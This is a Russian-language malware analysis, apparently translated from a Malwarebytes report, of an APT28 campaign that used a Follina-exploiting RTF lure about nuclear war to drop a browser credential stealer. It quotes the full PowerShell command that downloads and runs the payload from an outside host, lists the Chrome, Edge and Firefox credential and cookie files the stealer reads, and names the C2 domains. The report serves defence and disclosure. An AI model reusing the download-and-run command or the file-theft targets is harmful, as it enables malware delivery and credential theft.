Российская APT28 использует страх ядерной войны для распространения Follina docs в Украине
В недавней кампании APT28, передовая постоянная угроза, связанная с российской разведкой, нацелилась на Украину, нацелив на пользователей вредоносное ПО, которое крадет учетные данные, хранящиеся в браузерах.
APT28 (также известная как Sofacy и Fancy Bear) — печально известная российская угроза для недружественных странд, действующая как минимум с 2004 года, основной деятельностью которой является сбор разведданных для российского правительства. Известно, что эта группа нацелена на американских политиков и американские организации, включая ядерные объекты США.
20 июня 2022 года Malwarebytes Threat Intelligence обнаружила документ, который был вооружен эксплойтом Follina (CVE-2022-30190) для загрузки и запуска нового .Net stealer, о котором впервые сообщила Google. Открытие также было сделано независимо компанией CERT-UA.
Follina — это недавно обнаруженный эксплойт нулевого дня, который использует ms-msdt
протокол для загрузки вредоносного кода из документов Word при их открытии. Это первый раз, когда мы наблюдали, как APT28 использует Follina в своих операциях.
Вредоносный документ
Имя файла maldoc, Nuclear Terrorism A Very Real Threat.rtf
, пытается заставить жертв открыть его, наживаясь на их страхах, что Спецоперация в Украине перерастет в ядерный конфликт.
Содержание документа — статья Атлантического совета под названием “Будет ли Путин использовать ядерное оружие в Украине? Наши эксперты отвечают на три животрепещущих вопроса”, опубликованный 10 мая этого года.
Приманка спрашивает: “Будет ли Путин использовать ядерное оружие в Украине?”
Maldoc — это RTF-файл, скомпилированный 10 июня, что позволяет предположить, что атака была использована примерно в то же время. Он использует удаленный шаблон, встроенный в Document.xml.rels
файл, для извлечения удаленного HTML-файла из URL http://kitten-268.frge.io/article.html.
HTML-файл использует вызов JavaScript для window.location.href
загрузки и выполнения закодированного сценария PowerShell с использованием ms-msdt
схемы URI MSProtocol. Расшифрованный скрипт используется cmd
для запуска кода PowerShell, который загружает и выполняет конечную полезную нагрузку:
"C:\WINDOWS\system32\cmd.exe" /k powershell -NonInteractive -WindowStyle Hidden -NoProfile -command "& {iwr http://kompartpomiar.pl/grafika/SQLite.Interop.dll -OutFile "C:\Users\$ENV:UserName\SQLite.Interop.dll";iwr http://kompartpomiar.pl/grafika/docx.exe -OutFile "C:\Users\$ENV:UserName\docx.exe";Start-Process "C:\Users\$ENV:UserName\docx.exe"}"
Анализ полезной нагрузки
Конечная полезная нагрузка — это вариант похитителя, который APT28 ранее использовал против целей в Украине. В самом старом варианте похититель использовал поддельное сообщение об ошибке, чтобы скрыть, что он делает (вторичный поток отображал это сообщение об ошибке, в то время как основная программа продолжала выполняться). Новый вариант не показывает всплывающее окно.
В более старых версиях the stealer поддельное сообщение об ошибке отвлекало пользователей
Вариант, используемый в этой атаке, почти идентичен тому, о котором сообщает Google, с несколькими незначительными рефакторингами и некоторыми дополнительными командами сна.
Google Chrome и Microsoft Edge
Вредоносная программа крадет любые учетные данные веб-сайта (имя пользователя, пароль и URL), которые пользователи сохранили в браузере, прочитав содержимое %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data
.
Сеанс отладки, показывающий, как злоумышленники могут украсть учетные данные
Очень похожим образом новый вариант также захватывает все сохраненные файлы cookie, хранящиеся в Google Chrome, путем доступа %LOCALAPPDATA%\Google\Chrome\User Data\Default\Network\Cookies
.
Код кражи файлов cookie (Google Chrome)
Украденные файлы cookie иногда могут быть использованы для взлома веб-сайтов, даже если имя пользователя и пароль не сохранены в браузере.
Код для кражи файлов cookie и паролей из браузера Edge на базе Chromium практически идентичен коду, используемому для Chrome.
Firefox
Эта вредоносная программа также может красть данные из Firefox. Он делает это, просматривая каждый профиль в поисках cookies.sqlite
файла, в котором хранятся файлы cookie для каждого пользователя.
Sysmon захватывает доступ к файлу cookies.sqlite
В случае паролей злоумышленники пытаются украсть logins.json
, key3.db
, key4.db
, cert8.db
, cert9.db
, signons.sqlite
.
Злоумышленники также захватят пароли из Firefox
Эти файлы необходимы для восстановления таких элементов, как сохраненные пароли и сертификаты. Старые версии также поддерживаются (signons.sqlite
key3.db
и cert8.db
больше не используются новыми версиями Firefox). Обратите внимание, что если пользователь установил мастер-пароль, злоумышленники, скорее всего, позже попытаются взломать этот пароль в автономном режиме, чтобы восстановить эти учетные данные.
Эксфильтрация данных
Вредоносная программа использует протокол электронной почты IMAP для передачи данных на свой сервер управления и контроля (C2).
Событие входа в систему по протоколу IMAP
Старый вариант этого похитителя, связанный с почтой [.]sartoc.com (144.208.77.68) для извлечения данных. Новый вариант использует тот же метод, но в другом домене, www.specialityllc [.]ком. Интересно, что оба находятся в Дубае.
Вполне вероятно, что владельцы сайтов C2 не имеют никакого отношения к APT28, и группа просто воспользовалась заброшенными или уязвимыми сайтами.
Хотя взлом браузеров может выглядеть как мелкая кража, пароли являются ключом к доступу к конфиденциальной информации и разведданным. Цель и участие APT28, подразделения Российской военной разведки), предполагает, что кампания является частью Спецоперации в Украине или, по крайней мере, связана с внешнеполитическими и военными целями Российского государства. Украина продолжает оставаться полем битвы для кибератак и шпионажа.
Автор — Шахулов Никита